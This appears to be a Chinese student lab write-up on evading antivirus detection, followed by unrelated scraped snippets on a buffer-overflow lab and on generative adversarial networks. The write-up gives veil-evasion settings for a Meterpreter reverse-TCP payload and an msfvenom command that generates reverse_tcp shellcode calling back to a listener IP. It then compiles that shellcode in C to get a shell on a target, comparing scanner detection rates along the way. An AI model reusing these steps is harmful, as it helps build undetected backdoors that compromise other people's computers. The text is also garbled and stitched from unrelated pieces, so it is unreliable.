1.殺軟是如何檢測出惡意**的?
2.免殺是做什麼?
3.免殺的基本方法有哪些?
在本次實驗中,
win8 172.20.10.3
linux 192.168.31.132
使用msf生成後門檔案的檢測
在之前的實驗中,我們已經生成了乙個木馬程式。
可以通過virscan.org來檢驗一下病毒的抗殺能力。掃瞄結果如下:
從圖中可以看出,報毒率還是挺高的,39款殺軟中就有22款掃瞄出病毒,基本上現在主流的殺軟都能查殺出來。
msfvenom使用編碼器生成meterpreter可執行檔案
veil-evasion生成後門檔案的檢測
veil-evasion是乙個與metasploit有點類似的免殺平台,用其他語言如c,c#,phython,ruby,go,powershell等重寫了meterperter,然後再通過不同方式編譯成exe。
在終端下輸入指令veil-evasion開啟軟體,根據menu的提示依次輸入以下指令:
use python/meterpreter/rev_tcp
//設定payload
set lhost 192.168.18.128
//設定**連線ip
set port 443
//設定**埠443,預設為4444
generate
//生成
5232
//程式名
放到virscan.org**上掃瞄一下:
比之前用msf生成的檔案報毒率要更低,僅有10個引擎報毒。
c語言呼叫shellcode
在kali主機下,進入終端,執行指令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.128 lport=443 -f c
將上述**從虛擬機器裡copy出來,用microsoft visual studio 2013進行編譯執行生成可執行檔案
nc111.cpp
在kali下進入msf開啟監聽程序
在靶機上執行nc111可執行檔案,kali成功獲取許可權
virscan.org檢測結果如下:
此檔案有4個引擎報毒風險已經降低了不少,但是仍被定性為病毒檔案。
win8.1 電腦管家共存
這次實驗讓我充分理解了免殺原理,有不少方法可以免殺,為電腦帶來一些潛在的風險。現如今社會,處處離不開網路,需要提高安全防範意識,定期檢查電腦,防止別人惡意盜用資訊。
20145232韓文浩《網路對抗》PC平台逆向破解
1 linux下有兩種基本構造攻擊buf的方法 retaddr nop shellcode,nop shellcode retaddr。我們採用anything retaddr nops shellcode的方法。2 實驗的目標是找到返回位址的位置和shellcode的位址。然後通過修改返回位址使其...
半監督生成對抗網路 生成對抗網路
一 生成對抗網路相關概念 一 生成模型在概率統計理論中,生成模型是指能夠在給定某些隱含引數的條件下,隨機生成觀測資料的模型,它給觀測值和標註資料序列指定乙個聯合概率分布。在機器學習中,生成模型可以用來直接對資料建模,也可以用來建立變數間的條件概率分布。通常可以分為兩個型別,一種是可以完全表示出資料確...
生成對抗網路
我們提出乙個框架來通過對抗方式評估生成模型,我們同時訓練兩個模型 乙個生成模型g捕捉資料分布,乙個鑑別模型d估計乙個樣本來自於訓練資料而不是g的概率。g的訓練過程是最大化d犯錯的概率。這個框架與minmax兩個玩家的遊戲相對應。在任意函式g和d的空間存在乙個唯一解,g恢復訓練資料的分布,d等於1 2...